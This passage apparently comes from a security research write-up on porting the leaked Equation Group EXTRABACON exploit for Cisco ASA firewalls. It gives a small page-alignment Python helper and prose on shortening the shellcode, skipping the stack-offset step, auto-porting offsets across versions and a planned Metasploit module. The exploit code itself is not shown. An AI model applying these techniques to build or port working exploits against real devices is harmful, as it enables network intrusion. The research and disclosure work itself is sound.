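Flooring to the page boundary is just masking off the low 12 bits. A tiny Python sketch, using the 8.4(3) pmcheck() address from earlier as the test value (page_floor() is my own helper name):

```python
PAGE_SIZE = 0x1000

def page_floor(addr):
    """Round an address down to the start of its 4 KiB page."""
    return addr & ~(PAGE_SIZE - 1)

print(hex(page_floor(0x954cfd0)))  # 0x954c000
```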

Improving the Shellcode

We were able to combine the Equation Group stages "preamble" and "payload" into a single stage by rewriting the shellcode. Here is a list of ways we shortened the exploit code:

Removed all XOR 0xa5a5a5a5 operations, as null bytes are allowed
Reused code for the two sys_mprotect() calls
Used a single mov operation instead of jmp/call/pop/rep movs to patch the code
General shellcode size optimization tricks (performing the same tasks with ops that use fewer bytes)

The lackadaisical approach to the shellcode, as well as the Python code, came as a bit of a surprise, as the Equation Group is probably the most elite APT on the planet. There's a lot of cleverness in the code though, and whoever originally wrote it obviously had to be competent. To me, it appears the shellcode is kind of an off-the-shelf solution to solving generic problems, instead of being custom tailored for the exploit.

By changing the shellcode, we gained one enormous benefit. We no longer have to find the stack offset that contains a pointer to the third stage. This step gave us so much trouble that we started experimenting with using an egg hunter. We know that the stack offset to the third stage was a bottleneck for SilentSignal as well (Bake Your Own EXTRABACON). But once we understood the overall operation of all stages, we were happy to just reduce the bytes and keep everything in the one stage. Not having to find the third stage offset makes porting the exploit very simple.

Future Work

The Equation Group appeared to have generated their shellcode. We have written a Python script that will auto-port the code to different versions. We find offsets using similar heuristics to what ROPGadget offers. Of course, you can't trust a tool 100% (in fact, some of the Equation Group shellcode crashes certain versions). So we are testing each version.

We're also porting the Python code to Ruby, so the exploit will be part of Metasploit. Our Metasploit module will contain the new shellcode for all Shadow Brokers versions, as well as offsets for numerous versions not part of the original release, so keep an eye out for it.
